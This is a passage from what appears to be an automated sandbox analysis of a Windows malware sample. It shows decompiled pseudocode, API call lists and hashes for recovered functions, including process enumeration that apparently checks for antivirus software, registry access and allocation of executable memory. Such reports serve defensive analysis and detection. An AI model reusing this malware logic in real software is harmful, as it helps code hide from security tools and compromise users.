                              • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,053DD0D4,80000001,?,?,80000001), ref: 053E1F71
                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 053E1F88
                              • HeapFree.KERNEL32(00000000,00000000,?,053DD0D4,80000001,?,?,80000001,?,?,00000000,?,?,?,053C2E53,80000001), ref: 053E1FA3
                              • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,053DD0D4,80000001,?,?,80000001,?,?,00000000), ref: 053E1FC2
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: HeapQueryValue$AllocateFree
                              • String ID:
                              • API String ID: 4267586637-0
                              • Opcode ID: bbc65b65a190ac063adc926435d70aad2de30c19b0daff34fe594753baf3642d
                              • Instruction ID: 9f6011767a7282170c01445cffef0177058af29ba7763c5a02fd4d2776a73264
                              • Opcode Fuzzy Hash: bbc65b65a190ac063adc926435d70aad2de30c19b0daff34fe594753baf3642d
                              • Instruction Fuzzy Hash: B61149B6910118BFDB228E88DC84CAEBBBDFB88710B104166F902A6250D6715E41DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D9288, Relevance: 6.0, APIs: 4, Instructions: 42stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,053F01F4,00000000,053CB176,?,053C145C,?), ref: 053D92A7
                              • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,053F01F4,00000000,053CB176,?,053C145C,?), ref: 053D92B2
                              • _wcsupr.NTDLL ref: 053D92BF
                              • lstrlenW.KERNEL32(00000000), ref: 053D92C7
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                              • String ID:
                              • API String ID: 2533608484-0
                              • Opcode ID: c5ecc8838ae7a6d9f00b51620a939a7c8ea4164350503e9ed07db0bab695b3a2
                              • Instruction ID: 9ea34d79834cc836452f26cf1f7924556b794ec12181482d41c600120a018331
                              • Opcode Fuzzy Hash: c5ecc8838ae7a6d9f00b51620a939a7c8ea4164350503e9ed07db0bab695b3a2
                              • Instruction Fuzzy Hash: 9AF0B4377051246F93226A746CCDE6FAFEDBB85B51F100529F851DA080DFA4CC0146B4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D3309, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                              Download Yara Rule
                              C-Code - Quality: 68%
                              			E049D3309() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x49dd2b8; // 0xe3a5a8
						_t2 = _t9 + 0x49dee88; // 0x73617661
						_push( &_v264);
						if( *0x49dd110() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}










                              0x049d3314
                              0x049d3319
                              0x049d331e
                              0x049d3322
                              0x049d332c
                              0x049d335d
                              0x049d3333
                              0x049d3338
                              0x049d3345
                              0x049d334e
                              0x049d3365
                              0x049d3350
                              0x049d3358
                              0x00000000
                              0x049d3358
                              0x049d3366
                              0x049d3367
                              0x00000000
                              0x049d3367
                              0x00000000
                              0x049d3361
                              0x049d336d
                              0x049d3372

                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 049D3319
                              • Process32First.KERNEL32(00000000,?), ref: 049D332C
                              • Process32Next.KERNEL32(00000000,?), ref: 049D3358
                              • CloseHandle.KERNEL32(00000000), ref: 049D3367
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: cec6ef6dd2bef25febaf793b9a6ce76a5d07ad5bfbd4dc626ad5374d22759a1c
                              • Instruction ID: 911b91b194654fb7fbe0d0711b651a17f2092bcc1d4ba99394d7d6a9dca755ef
                              • Opcode Fuzzy Hash: cec6ef6dd2bef25febaf793b9a6ce76a5d07ad5bfbd4dc626ad5374d22759a1c
                              • Instruction Fuzzy Hash: 0EF0E0326060286BE730BA65DD49DEBB7ACEBC5755F40C171FD55D3000EE34F98586A2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C5270, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              • InterlockedIncrement.KERNEL32(053F00BC), ref: 053C5285
                                • Part of subcall function 053DD9F4: GetSystemTimeAsFileTime.KERNEL32(?), ref: 053DDA1F
                                • Part of subcall function 053DD9F4: HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 053DDA2C
                                • Part of subcall function 053DD9F4: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 053DDAB8
                                • Part of subcall function 053DD9F4: GetModuleHandleA.KERNEL32(00000000), ref: 053DDAC3
                                • Part of subcall function 053DD9F4: RtlImageNtHeader.NTDLL(00000000), ref: 053DDACC
                                • Part of subcall function 053DD9F4: RtlExitUserThread.NTDLL(00000000), ref: 053DDAE1
                              • InterlockedDecrement.KERNEL32(053F00BC), ref: 053C52A9
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                              • String ID: t
                              • API String ID: 1011034841-2238339752
                              • Opcode ID: fc4103548cc1f9923465ae316b6032dc8d20742024f3d5d559ef334824391b5e
                              • Instruction ID: 86c6c774a97cdaf9df89bddd28dcc4666fe577b5e8edfb2e75f3b3b68d07e905
                              • Opcode Fuzzy Hash: fc4103548cc1f9923465ae316b6032dc8d20742024f3d5d559ef334824391b5e
                              • Instruction Fuzzy Hash: 9DE01231389231A7C7225A78980CF6ABFDAFB50755F40465CF94BD4190DA61DC109792
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D230A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E049D230A(signed int __edx, void* __edi, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t8;
				void* _t9;
				void* _t10;
				signed int _t11;

				_t11 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x49dd270 = _t3;
				if(_t3 == 0) {
					_t9 = 8;
					return _t9;
				}
				E049DD160 = GetTickCount();
				_t5 = E049D2CBF(_a4);
				if(_t5 == 0) {
					E049D2EBD(_t10, __edi, _a4); // executed
					if(E049D3AF1(_t10) != 0) {
						 *0x49dd298 = 1; // executed
					}
					_t8 = E049D587D(_t11); // executed
					return _t8;
				}
				return _t5;
			}









                              0x049d230a
                              0x049d2313
                              0x049d231b
                              0x049d2320
                              0x049d2324
                              0x00000000
                              0x049d2324
                              0x049d2331
                              0x049d2336
                              0x049d233d
                              0x049d2343
                              0x049d234f
                              0x049d2351
                              0x049d2351
                              0x049d235b
                              0x00000000
                              0x049d235b
                              0x049d2360

                              APIs
                              • HeapCreate.KERNEL32(00000000,00400000,00000000,049D4154,?), ref: 049D2313
                              • GetTickCount.KERNEL32 ref: 049D2327
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: CountCreateHeapTick
                              • String ID: Txt
                              • API String ID: 2177101570-4033135041
                              • Opcode ID: 2f476d64e8727b90594d010f29c1f0fca4955bbec3e3286ce0b9032131683e50
                              • Instruction ID: c501dc79d834557adcc5e867b3fe2bf0176f83347faf37d424e5c3adb82267d8
                              • Opcode Fuzzy Hash: 2f476d64e8727b90594d010f29c1f0fca4955bbec3e3286ce0b9032131683e50
                              • Instruction Fuzzy Hash: 30E09234289300AAFB206F709D06B19BAA8FB44B89F00C574E509D1190EB74F840D622
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053CEA7F, Relevance: 5.1, APIs: 4, Instructions: 110COMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 053CEAA5
                              • memcpy.NTDLL ref: 053CEACD
                                • Part of subcall function 053D09CA: NtAllocateVirtualMemory.NTDLL(053CC119,00000000,00000000,053CC119,00003000,00000040), ref: 053D09FB
                                • Part of subcall function 053D09CA: RtlNtStatusToDosError.NTDLL(00000000), ref: 053D0A02
                                • Part of subcall function 053D09CA: SetLastError.KERNEL32(00000000), ref: 053D0A09
                              • GetLastError.KERNEL32(00000010,00000218,053E8D4D,00000100,?,00000318,00000008), ref: 053CEAE4
                              • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,053E8D4D,00000100), ref: 053CEBC7
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                              • String ID:
                              • API String ID: 685050087-0
                              • Opcode ID: 2e4aac379384272ac7f4963224db003f0a6114e02e0a5002c8e23124aee04dcf
                              • Instruction ID: 39f418454dbead8bb63f7539ca5f8afa481da01a531b65adfe7b9be5b128fd60
                              • Opcode Fuzzy Hash: 2e4aac379384272ac7f4963224db003f0a6114e02e0a5002c8e23124aee04dcf
                              • Instruction Fuzzy Hash: C1415FB2608301AFD721DF24D845FABFBE9BF48310F00492DF599C6290E770D9149B62
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D456E, Relevance: 4.6, APIs: 3, Instructions: 73memorystringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 79%
                              			E049D456E(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0x49dd270, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E049DAA99(_t57 - _a4, _a4, _t48);
							_t38 = E049DAA99(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E049DAA99(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}
















                              0x049d4576
                              0x049d457b
                              0x049d457d
                              0x049d4584
                              0x049d4596
                              0x049d4596
                              0x049d459a
                              0x049d459c
                              0x049d459f
                              0x049d45a2
                              0x049d45ab
                              0x049d45b5
                              0x049d45b9
                              0x049d45be
                              0x049d45ce
                              0x049d45d4
                              0x049d45d8
                              0x049d4627
                              0x049d45da
                              0x049d45da
                              0x049d45e3
                              0x049d45f2
                              0x049d45f7
                              0x049d4604
                              0x049d460d
                              0x049d4618
                              0x049d461f
                              0x049d4623
                              0x049d4623
                              0x049d45d8
                              0x049d462e
                              0x049d4635

                              APIs
                              • lstrlen.KERNEL32(747DF710,?,00000000,?,747DF710), ref: 049D45A2
                              • StrStrA.SHLWAPI(00000000,?), ref: 049D45AF
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 049D45CE
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AllocateHeaplstrlen
                              • String ID:
                              • API String ID: 556738718-0
                              • Opcode ID: 3b851b0103feb6c7b54dc1330fe522d6e7a0d1e40f5fe1fbab9d3e0f54819b46
                              • Instruction ID: b640566342536e7fd91bbaea3b24e632073b368b4f2526c56cb90d5ffc7bccd7
                              • Opcode Fuzzy Hash: 3b851b0103feb6c7b54dc1330fe522d6e7a0d1e40f5fe1fbab9d3e0f54819b46
                              • Instruction Fuzzy Hash: CA216D3660011AAFCF11CFA9D984B9EBFB9EF85315F048265E804AB305C734E915CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053DD058, Relevance: 4.6, APIs: 3, Instructions: 73registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053DA02D: lstrlen.KERNEL32(?,00000000,00000000,00000027,?,?,00000000,053DD07F,?,00000000,?,?,?,053C2E53,80000001), ref: 053DA063
                                • Part of subcall function 053DA02D: lstrcpy.KERNEL32(00000000,00000000), ref: 053DA087
                                • Part of subcall function 053DA02D: lstrcat.KERNEL32(00000000,00000000), ref: 053DA08F
                              • RegOpenKeyExA.KERNEL32(053C2E53,00000000,00000000,00020119,80000001,?,?,00000000,?,?,?,053C2E53,80000001), ref: 053DD09F
                              • RegOpenKeyExA.ADVAPI32(053C2E53,053C2E53,00000000,00020019,80000001,?,?,00000000,?,?,?,053C2E53,80000001), ref: 053DD0B5
                              • RegCloseKey.ADVAPI32(80000001,80000001,?,?,80000001,?,?,00000000,?,?,?,053C2E53,80000001), ref: 053DD0FE
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Open$Closelstrcatlstrcpylstrlen
                              • String ID:
                              • API String ID: 4131162436-0
                              • Opcode ID: d405516782483a5587719964f19adfe5b31fcc0d5f15c70b4c32436f66d977bd
                              • Instruction ID: 869d271c558f6f5030478d0febc8166f343e43fddf3237633eb74e5438126b2c
                              • Opcode Fuzzy Hash: d405516782483a5587719964f19adfe5b31fcc0d5f15c70b4c32436f66d977bd
                              • Instruction Fuzzy Hash: DE215EB6A00219BFCB01DF99EC85CAEBBBCFB44344B100476F501E6151DB71AE56DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D311C, Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                              Download Yara Rule
                              C-Code - Quality: 47%
                              			E049D311C(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E049D55DC(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x49dc2a4); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                              0x049d3120
                              0x049d312d
                              0x049d312f
                              0x049d3130
                              0x049d3138
                              0x049d3138
                              0x049d313c
                              0x00000000
                              0x00000000
                              0x049d3133
                              0x049d3134
                              0x049d3137
                              0x049d3137
                              0x049d3144
                              0x049d314b
                              0x049d314e
                              0x049d3156
                              0x049d315c
                              0x049d315e
                              0x049d3161
                              0x049d3165
                              0x049d3167
                              0x049d316a
                              0x049d316a
                              0x049d316b
                              0x049d316d
                              0x049d316a
                              0x049d3177
                              0x049d317a
                              0x049d317d
                              0x049d3180
                              0x049d3180
                              0x049d3187
                              0x049d3187
                              0x049d3193

                              APIs
                              • StrChrA.SHLWAPI(?,00000020,00000000,058195AC,?,?,049D3A64,?,058195AC), ref: 049D3138
                              • StrTrimA.SHLWAPI(?,049DC2A4,00000002,?,049D3A64,?,058195AC), ref: 049D3156
                              • StrChrA.SHLWAPI(?,00000020,?,049D3A64,?,058195AC), ref: 049D3161
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Trim
                              • String ID:
                              • API String ID: 3043112668-0
                              • Opcode ID: 46b7f8f2ff3624e8bdbcf4e2ad6a2e363dbde6d0d31ad47d42472e829c8cfea2
                              • Instruction ID: 8e00e38733f49d55bc3435bd153f57e2860927b654ade5e992a85b6b120be732
                              • Opcode Fuzzy Hash: 46b7f8f2ff3624e8bdbcf4e2ad6a2e363dbde6d0d31ad47d42472e829c8cfea2
                              • Instruction Fuzzy Hash: C501BC72304346BEE7205E6A8C44F672B9EEBCD792F04C031BE45CB282D670E842C7A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D62E1, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 48COMMON
                              Download Yara Rule
                              C-Code - Quality: 64%
                              			E049D62E1(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t14 = E049D6FB2(_a4, _t26, __edi); // executed
				_t28 = _t14;
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x49dd2b8; // 0xe3a5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x49de4e8; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x49de8d0; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E049D2522();
					_push( &_v64);
					if( *0x49dd0e4() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E049D2522();
				}
				return _t28;
			}















                              0x049d62e1
                              0x049d62e8
                              0x049d62f1
                              0x049d62f6
                              0x049d62fa
                              0x049d6304
                              0x049d6309
                              0x049d630e
                              0x049d6316
                              0x049d631d
                              0x049d6327
                              0x049d6327
                              0x049d631f
                              0x049d631f
                              0x049d631f
                              0x049d631f
                              0x049d632d
                              0x049d6333
                              0x049d6334
                              0x049d6337
                              0x049d633a
                              0x049d633d
                              0x049d6345
                              0x049d634e
                              0x049d6356
                              0x049d6356
                              0x049d6358
                              0x049d635a
                              0x049d635a
                              0x049d6364

                              APIs
                                • Part of subcall function 049D6FB2: SysAllocString.OLEAUT32(00000000), ref: 049D700E
                                • Part of subcall function 049D6FB2: SysAllocString.OLEAUT32(0070006F), ref: 049D7022
                                • Part of subcall function 049D6FB2: SysAllocString.OLEAUT32(00000000), ref: 049D7034
                                • Part of subcall function 049D6FB2: SysFreeString.OLEAUT32(00000000), ref: 049D7098
                              • memset.NTDLL ref: 049D6304
                              • GetLastError.KERNEL32 ref: 049D6350
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: String$Alloc$ErrorFreeLastmemset
                              • String ID: <
                              • API String ID: 1330562889-4251816714
                              • Opcode ID: 164ee0f776e8037f564435177378e4b376df96f6ed86993101e5cc65c4b25da9
                              • Instruction ID: 5e0cf6488e6b9b9687d7bb7cd001b3cb64d47905135e1f3122fed15d8d96333c
                              • Opcode Fuzzy Hash: 164ee0f776e8037f564435177378e4b376df96f6ed86993101e5cc65c4b25da9
                              • Instruction Fuzzy Hash: AF012971A00218ABDB10EFA8D884EDEBBBCAF48744F448136F905E7250E770E9418BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D64DE, Relevance: 4.5, APIs: 3, Instructions: 40registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegCreateKeyA.ADVAPI32(80000001,064FB7F0,064F8578), ref: 053D64F3
                              • RegOpenKeyA.ADVAPI32(80000001,064FB7F0,064F8578), ref: 053D64FD
                              • lstrlen.KERNEL32(064FB7F0,00000000,00000000,053EF072,?,?,?,053CFFEA,00000001,00000001,064F8578), ref: 053D651C
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CreateOpenlstrlen
                              • String ID:
                              • API String ID: 2865187142-0
                              • Opcode ID: e19c9a3dcb2d878a58d81b3774c7baf721855a817ef1b2db50791ea8bcd5eed0
                              • Instruction ID: a96b28b55bb36d461825c5e6db1a79cd896048aae591cb5946007b9b339f7442
                              • Opcode Fuzzy Hash: e19c9a3dcb2d878a58d81b3774c7baf721855a817ef1b2db50791ea8bcd5eed0
                              • Instruction Fuzzy Hash: 63F062B6100208BFD7219F90EC4AFAB7FBDEB857A0F10811AF90289140D6B0DA80C770
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E2501, Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMON
                              Download Yara Rule
                              APIs
                              • SetEvent.KERNEL32(0000010C,053D161F), ref: 053E250B
                                • Part of subcall function 053E22AA: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,053E2516), ref: 053E22D3
                                • Part of subcall function 053E22AA: RtlDeleteCriticalSection.NTDLL(053F0440), ref: 053E2306
                                • Part of subcall function 053E22AA: RtlDeleteCriticalSection.NTDLL(053F0460), ref: 053E230D
                                • Part of subcall function 053E22AA: ReleaseMutex.KERNEL32(000007D0,00000000,?,?,?,053E2516), ref: 053E2335
                                • Part of subcall function 053E22AA: CloseHandle.KERNEL32(?,?,053E2516), ref: 053E2341
                                • Part of subcall function 053E22AA: ResetEvent.KERNEL32(00000000,00000000,?,?,?,053E2516), ref: 053E234D
                                • Part of subcall function 053E22AA: CloseHandle.KERNEL32(?,?,053E2516), ref: 053E2359
                                • Part of subcall function 053E22AA: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,053E2516), ref: 053E235F
                                • Part of subcall function 053E22AA: SleepEx.KERNEL32(00000064,00000001,?,?,053E2516), ref: 053E2373
                                • Part of subcall function 053E22AA: HeapFree.KERNEL32(00000000,00000000,?,?,053E2516), ref: 053E2396
                                • Part of subcall function 053E22AA: RtlRemoveVectoredExceptionHandler.NTDLL(04AD05B8), ref: 053E23D0
                                • Part of subcall function 053E22AA: SleepEx.KERNEL32(00000064,00000001,?,?,053E2516), ref: 053E23DF
                              • CloseHandle.KERNEL32(0000010C), ref: 053E2520
                              • HeapDestroy.KERNELBASE(06100000), ref: 053E2530
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Sleep$CloseHandle$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
                              • String ID:
                              • API String ID: 2773679374-0
                              • Opcode ID: 0f6f5c9fa8d896c98b872189225f7220a1fc17154a5029cb72ce825db5a6ebab
                              • Instruction ID: 6e291eefdd97787836af48cceac5ee86558f1a15c4eecde6f6339c434ea75ce7
                              • Opcode Fuzzy Hash: 0f6f5c9fa8d896c98b872189225f7220a1fc17154a5029cb72ce825db5a6ebab
                              • Instruction Fuzzy Hash: EDE0ECB87242124B8B319F74E95DA0B3BEDBA04341B040415B406CE1C4DE38EA05C710
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D60DD, Relevance: 3.8, APIs: 3, Instructions: 81COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E049D60DD(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E049D55DC(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x49dd308, 0x110);
					_t27 =  *0x49dd30c; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E049D6E0F(0x110, _a4, _t27, 0);
					}
					if(E049D8DD3( &_v36) != 0 && E049D6E7F(0x110, _a4,  &_v20,  &_v12,  &_v36, 0) == 0) {
						_t55 = _v20;
						_v36 =  *_t46;
						_t38 = E049D2363(_t55, _a8, _t51, _t46, _a12); // executed
						_v16 = _t38;
						 *(_t55 + 4) = _v36;
						memset(_t55, 0, _v12 - (_t46[4] & 0xf));
						_t57 = _t57 + 0xc;
						E049D6DFA(_t55);
					}
					memset(_a4, 0, _t53);
					E049D6DFA(_a4);
				}
				return _v16;
			}















                              0x049d60e3
                              0x049d60e8
                              0x049d60f5
                              0x049d60f8
                              0x049d60fb
                              0x049d6102
                              0x049d6105
                              0x049d6113
                              0x049d6118
                              0x049d611d
                              0x049d6122
                              0x049d6124
                              0x049d612c
                              0x049d612c
                              0x049d613b
                              0x049d615e
                              0x049d6164
                              0x049d616a
                              0x049d6172
                              0x049d6178
                              0x049d6188
                              0x049d618d
                              0x049d6191
                              0x049d6191
                              0x049d619c
                              0x049d61a7
                              0x049d61a7
                              0x049d61b3

                              APIs
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • memcpy.NTDLL(00000000,00000110,?,?,?,00000008), ref: 049D6113
                              • memset.NTDLL ref: 049D6188
                              • memset.NTDLL ref: 049D619C
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: memset$AllocateHeapmemcpy
                              • String ID:
                              • API String ID: 1529149438-0
                              • Opcode ID: 5b9bff80f333cc0f50e19a3f06e3693333d520a79ac083170975f07ac4f9d327
                              • Instruction ID: 3830f573b22f45abe4414ca0a1c5e4f88d0d0dcb2cfffc703d64f8f92f56c7fa
                              • Opcode Fuzzy Hash: 5b9bff80f333cc0f50e19a3f06e3693333d520a79ac083170975f07ac4f9d327
                              • Instruction Fuzzy Hash: C5213175A00218ABEB11EF55CC41FEEBBB8EF49654F048035F905E7241E734EA51CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

